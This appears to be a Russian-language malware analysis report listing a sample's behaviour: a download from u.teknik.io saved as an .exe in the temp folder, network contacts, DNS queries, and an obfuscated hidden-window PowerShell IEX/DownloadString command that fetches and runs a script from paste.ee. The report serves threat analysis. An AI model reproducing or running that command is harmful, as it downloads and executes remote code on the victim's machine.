Техническая информация
- https://u.teknik.io/ubu1y.txt как %temp%\rifwqc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/MNyn0')
- <SYSTEM32>\windowspowershell\v1.0\powershell.exe
- 'pa##e.ee':80
- 'pa##e.ee':443
- 'u.##knik.io':443
- 'pa##e.ee':443
- 'u.##knik.io':443
- DNS ASK pa##e.ee
- DNS ASK u.##knik.io
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/MNyn0')' (со скрытым окном)